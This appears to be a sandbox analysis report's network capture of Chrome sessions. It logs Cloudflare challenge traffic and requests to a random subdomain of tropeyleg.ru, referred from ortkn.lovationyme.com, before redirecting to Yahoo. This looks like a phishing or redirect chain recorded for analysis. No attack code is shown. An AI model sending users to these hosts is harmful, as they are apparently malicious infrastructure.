                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              cf-chl-out-s: 4/OV/2YwJxiqehowqREiYOf6I/br+kjE/wF1X8A2gzlr5NPUdzWfI2h3wrxSsIZrcydyeQCcT1fhA5vjA0d+xkkCgoRxR2Ti6zuJ+1de3MMcayk/gXSEifBV5YmEP+q/4ijQgjte91FsByygx0Pkqusr28dMg9AnSG+RZc715Mwyu8MAzYYx5CCYbCZzWCLgb7lzToY6Jcgozw/jMVjpY31IewLkyWYhLkF8iqnEk1ufEifeDzrH13OkIjrE27g+JFUiTkpPZRJOB4LjZrrN2vjxmJ44NAaHIPz8Zb7xvHivgZPmoua88J2Y4Al2FIuHnOxLAQbtvSxRCvHDnXDaqRNeJCNXx21qjAzeeYb4vKnthptKfKLBshKVRZsOeCcnLgeQ0+vqxyB8f6RWH85mtAcBncVSd8yg4AwxBzW2h5Na3Gm3ZFsqVmwBpgokCsyRbv2anJblRIcv8fkESXdeudfF/oblmQXbZagzYU/aIbaZaFvGr6EBJi7J82ENLf7LSSvL5IwKjlrtg+vH0ov4vABCsC1X+S8MwPkOPo156XXaaZfqWiFXQxnKCDNj4TUrfdTso8zdZjl+3KdOxd7Lj3h2bFz4Bfph65AuzWoeKAVcJW9Dj3tienmkEt97WarMqNAI8+k0yT/NrnCu0Py6pe23Sct7FB1y0x5ek2207u5jE5mkUk3WYi8/xJLrJwVrkDe/m6GRXpO8lmyxLsE1EpJsxwpp4axZq22Lhagjsh3c9OyHOUZtpS1zTdgDlQDlewIMjGjBAVyh7cfQQr2+n3uvKNOYkgadUHu+elIhYgyNe4bTyvZb2ZxNaGBi9LWUoQJG5MQaBchOBXeb1dUTMkGOH7gjl4f8BlZxfxCUyXr2Ry3L+H0h6TBaFjukOtHCe5X5WLeEa0X+Q0/zTv8+os4xylTwh/+1N1yD1BWbK6BeURwTaKWqddtRNO3NkrG6EJMvzA63V4o1LEftJs4hn6bvEOyKseNcBq5q6p4cpA==$sqF5R [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:29 UTC32INData Raw: 43 46 2d 52 41 59 3a 20 38 63 66 38 37 32 63 63 38 62 63 32 63 34 34 61 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: CF-RAY: 8cf872cc8bc2c44a-EWR
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:29 UTC1363INData Raw: 6f 36 65 38 72 4a 32 76 72 34 75 61 6e 71 2b 4e 6d 4a 32 38 6f 6f 43 30 78 61 53 49 79 70 2f 42 6a 4c 36 71 73 71 72 53 79 72 65 61 32 61 2b 64 6e 61 6d 71 33 37 62 43 34 73 4c 6c 6d 63 4c 66 34 39 66 47 34 2b 65 74 78 2b 50 74 78 75 43 7a 34 39 4c 74 30 73 58 53 37 66 32 36 73 66 48 31 77 67 50 58 2b 74 7a 68 33 51 58 64 36 65 48 68 36 4e 7a 68 35 75 4d 42 46 65 62 76 43 76 41 51 38 51 37 34 31 50 45 4f 37 76 72 72 44 51 37 31 33 79 49 6c 49 2b 51 6f 41 42 62 71 42 43 6f 46 4a 42 55 46 2f 6a 50 32 4e 69 67 38 45 43 6e 76 39 6a 70 43 46 76 73 2f 4e 69 51 33 4d 44 51 31 50 30 46 42 48 55 49 78 48 79 4d 6f 4a 55 45 57 46 6b 78 52 4b 46 45 55 55 45 67 38 50 43 77 37 59 57 4e 66 4e 30 49 66 4e 6c 39 59 4b 30 78 6d 57 57 4a 64 5a 54 49 79 54 7a 4a 34 4e 33 4a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: o6e8rJ2vr4uanq+NmJ28ooC0xaSIyp/BjL6qsqrSyrea2a+dnamq37bC4sLlmcLf49fG4+etx+PtxuCz49Lt0sXS7f26sfH1wgPX+tzh3QXd6eHh6Nzh5uMBFebvCvAQ8Q741PEO7vrrDQ713yIlI+QoABbqBCoFJBUF/jP2Nig8ECnv9jpCFvs/NiQ3MDQ1P0FBHUIxHyMoJUEWFkxRKFEUUEg8PCw7YWNfN0IfNl9YK0xmWWJdZTIyTzJ4N3J
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:29 UTC1369INData Raw: 7a 74 5a 65 30 6c 59 43 74 66 72 69 77 73 61 57 34 6b 72 69 47 77 36 4b 36 6f 61 36 68 73 38 58 54 6c 4d 57 54 78 4c 72 49 70 38 2b 79 75 62 36 5a 77 64 48 61 30 4d 44 5a 6f 75 6a 63 33 72 72 72 70 2b 57 2f 76 61 37 4d 36 75 44 6a 37 4f 71 31 35 4f 4b 33 2f 4d 76 75 35 39 72 53 39 75 54 37 76 2f 72 39 31 64 33 6b 32 65 30 50 2f 65 34 42 33 2f 37 77 35 52 63 4c 35 52 48 32 38 78 4c 32 2f 68 59 41 36 67 45 5a 38 68 54 31 47 42 41 47 2f 42 6b 4c 37 50 77 63 41 67 59 70 4b 43 59 64 46 53 33 79 43 79 6b 72 47 7a 45 64 4b 7a 66 34 45 53 73 36 50 54 59 31 50 44 55 33 50 78 6f 31 50 6a 6c 47 4f 54 49 79 53 52 4a 44 4d 52 41 56 56 45 59 57 58 55 31 4f 56 45 6c 55 54 44 55 6c 48 6c 6b 69 49 6c 5a 4d 59 57 56 59 56 30 49 2f 5a 57 42 63 50 6e 52 6d 4d 56 70 56 63 55
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ztZe0lYCtfriwsaW4kriGw6K6oa6hs8XTlMWTxLrIp8+yub6ZwdHa0MDZoujc3rrrp+W/va7M6uDj7Oq15OK3/Mvu59rS9uT7v/r91d3k2e0P/e4B3/7w5RcL5RH28xL2/hYA6gEZ8hT1GBAG/BkL7PwcAgYpKCYdFS3yCykrGzEdKzf4ESs6PTY1PDU3Pxo1PjlGOTIySRJDMRAVVEYWXU1OVElUTDUlHlkiIlZMYWVYV0I/ZWBcPnRmMVpVcU
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:29 UTC1369INData Raw: 6d 62 47 31 78 70 47 54 77 35 72 49 71 4b 57 4f 70 37 32 36 6b 71 75 4c 79 4a 57 74 30 73 65 4d 73 36 2f 50 6d 62 61 65 33 4b 79 38 35 61 53 31 73 4c 50 6c 6f 39 6d 33 35 72 72 46 78 4c 75 73 70 66 48 7a 74 63 33 79 36 4d 54 33 78 4f 58 4d 73 62 2f 64 41 73 4c 75 33 74 66 66 77 76 58 48 34 38 72 4a 33 51 2f 6f 32 68 49 53 30 77 6a 56 37 38 2f 6b 36 41 73 65 46 4e 77 63 2f 41 72 73 2b 2f 6a 34 39 52 59 58 2b 53 6f 71 43 43 76 6e 4d 41 6e 35 2f 51 77 6d 48 76 34 6f 43 52 58 34 46 68 51 32 2b 7a 38 56 48 67 73 79 50 79 38 42 2f 55 63 39 48 44 67 5a 4a 79 41 6f 50 30 49 68 55 43 67 2b 49 69 41 6f 57 51 30 32 4c 42 51 71 4e 45 73 32 47 56 4a 57 56 79 42 57 4f 56 51 6b 61 45 56 59 4b 6e 42 4e 51 6b 4a 7a 62 6d 4a 46 65 45 6c 43 53 31 49 38 63 55 78 59 54 55 78
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: mbG1xpGTw5rIqKWOp726kquLyJWt0seMs6/Pmbae3Ky85aS1sLPlo9m35rrFxLuspfHztc3y6MT3xOXMsb/dAsLu3tffwvXH48rJ3Q/o2hIS0wjV78/k6AseFNwc/Ars+/j49RYX+SoqCCvnMAn5/QwmHv4oCRX4FhQ2+z8VHgsyPy8B/Uc9HDgZJyAoP0IhUCg+IiAoWQ02LBQqNEs2GVJWVyBWOVQkaEVYKnBNQkJzbmJFeElCS1I8cUxYTUx
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:29 UTC375INData Raw: 70 57 37 6c 38 37 4f 6c 34 2b 74 6a 4d 2b 66 78 59 2b 4a 71 38 47 56 32 71 53 31 71 64 71 57 7a 35 37 50 74 39 4f 68 30 75 58 5a 74 75 72 44 33 37 6e 74 70 74 6d 75 79 62 7a 4c 73 65 62 54 34 62 4f 74 79 4e 50 4c 79 4e 6a 64 75 2f 4c 62 37 74 45 45 31 2f 48 46 43 73 66 6c 32 2b 66 47 2b 63 30 51 33 77 62 53 34 50 4d 4b 31 66 54 6e 45 4e 63 63 39 50 33 75 2b 66 55 67 48 2f 30 42 41 67 44 36 43 53 44 71 41 79 58 6a 4d 53 2f 6d 38 69 41 50 42 77 34 5a 47 78 30 39 46 41 38 70 44 7a 45 55 46 76 63 62 49 78 31 4b 48 67 59 4e 43 43 4d 72 48 43 49 6f 49 51 64 45 49 6a 42 4e 56 69 55 32 56 6b 6b 74 53 56 51 38 4e 6c 70 51 56 6c 64 5a 49 43 67 32 4e 53 5a 70 50 47 39 6b 4c 33 4e 79 56 57 67 77 59 32 78 79 55 46 46 6c 61 31 67 2f 51 58 41 39 54 57 4e 62 56 59 46 33
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: pW7l87Ol4+tjM+fxY+Jq8GV2qS1qdqWz57Pt9Oh0uXZturD37ntptmuybzLsebT4bOtyNPLyNjdu/Lb7tEE1/HFCsfl2+fG+c0Q3wbS4PMK1fTnENcc9P3u+fUgH/0BAgD6CSDqAyXjMS/m8iAPBw4ZGx09FA8pDzEUFvcbIx1KHgYNCCMrHCIoIQdEIjBNViU2VkktSVQ8NlpQVldZICg2NSZpPG9kL3NyVWgwY2xyUFFla1g/QXA9TWNbVYF3


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              31192.168.2.451046104.18.94.414431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:29 UTC487OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/2026836972:1728411327:0J2ljC7SPOhv7bDpKXPkeCVvQYtqToQCpwF-xLifL5A/8cf87240ceda19cb/6c598c69372390f HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:29 UTC349INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 19:13:29 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              cf-chl-out: 20QURvGAKGaWtojo+fD6WjYtVuwnIv1bIxs=$WSAIz7IzURD+mut8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              CF-RAY: 8cf872d20c9b4282-EWR
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:29 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: invalid


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              32192.168.2.451048188.114.97.34431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:30 UTC667OUTGET /006632232660803238073854jhitsjVtktHRTAPROLRPYNTLGOSRXIWYALPMAI HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: dwpiafciythvn44tps36lv9l4fgyrnovcbgad9jvcyrwlvtdwrd2.tropeyleg.ru
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Origin: https://ortkn.lovationyme.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://ortkn.lovationyme.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:31 UTC723INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 19:13:31 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=990QUijgA1fiY4DeTwzv%2BhlDPQJr4p0LMnTMrxLLBqkvbyyDHxvEPasUfRSKm5NWSckbF9kL7CDJuuwFeuasLbzsoXmtKWhpQWo15FKB3%2B7VqK2U3l3xacgrM651DzTVZFUkw8dLzpW%2F%2FAFNe9jH3fhfi0nqAvN3lByml3WHxpG8pWOnLHMzfulSLXArbZg8Ajc%2BOw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              CF-RAY: 8cf872d72e756a5f-EWR
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:31 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 11
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              33192.168.2.45104974.6.143.264431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:31 UTC699OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-User: ?1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://ortkn.lovationyme.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:32 UTC428INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 19:13:31 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Language: en
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Location: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:32 UTC8INData Raw: 72 65 64 69 72 65 63 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: redirect


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              34192.168.2.451053188.114.97.34431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:32 UTC451OUTGET /006632232660803238073854jhitsjVtktHRTAPROLRPYNTLGOSRXIWYALPMAI HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: dwpiafciythvn44tps36lv9l4fgyrnovcbgad9jvcyrwlvtdwrd2.tropeyleg.ru
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:33 UTC695INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 19:13:33 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Nl8HtMFFF73kGtF6HuT48MUnJC%2BtX%2FLDgNFw6QT2Spz8jIjV1oovMlmm%2BanKuomFM4XGzTpAAAp9%2F1iq8xmT0%2B2HntZEioDBJ0lnnXfmnu5KwFCwC0zl6CfEWOkt0JCNUve5wz2Y%2FfabDeffJojsp0iXi1R2dEKbU6nBimSY7SuV5BfQJFiBFlWMUInExqVuk0aPzw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              CF-RAY: 8cf872e40dbd429b-EWR
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:33 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 11
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              35192.168.2.45105287.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:32 UTC703OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: www.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-User: ?1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://ortkn.lovationyme.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:33 UTC1288INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              expect-ct: max-age=31536000, report-uri="http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              referrer-policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              strict-transport-security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              set-cookie: yhome-viper=1; Domain=.www.yahoo.com; Path=/; Expires=Thu, 07 Nov 2024 19:13:33 GMT; HttpOnly; Secure
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              date: Tue, 08 Oct 2024 19:13:33 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-envoy-upstream-service-time: 42
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, max-age=0, private
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Expires: -1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; Expires=Thu, 9 Oct 2025 01:13:33 GMT; Max-Age=31557600; Domain=.yahoo.com; Path=/; SameSite=Lax; Secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; Expires=Thu, 9 Oct 2025 01:13:33 GMT; Max-Age=31557600; Domain=.yahoo.com; Path=/; SameSite=None; Secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; Domain=.yahoo.com; Path=/; SameSite=Lax; Secure
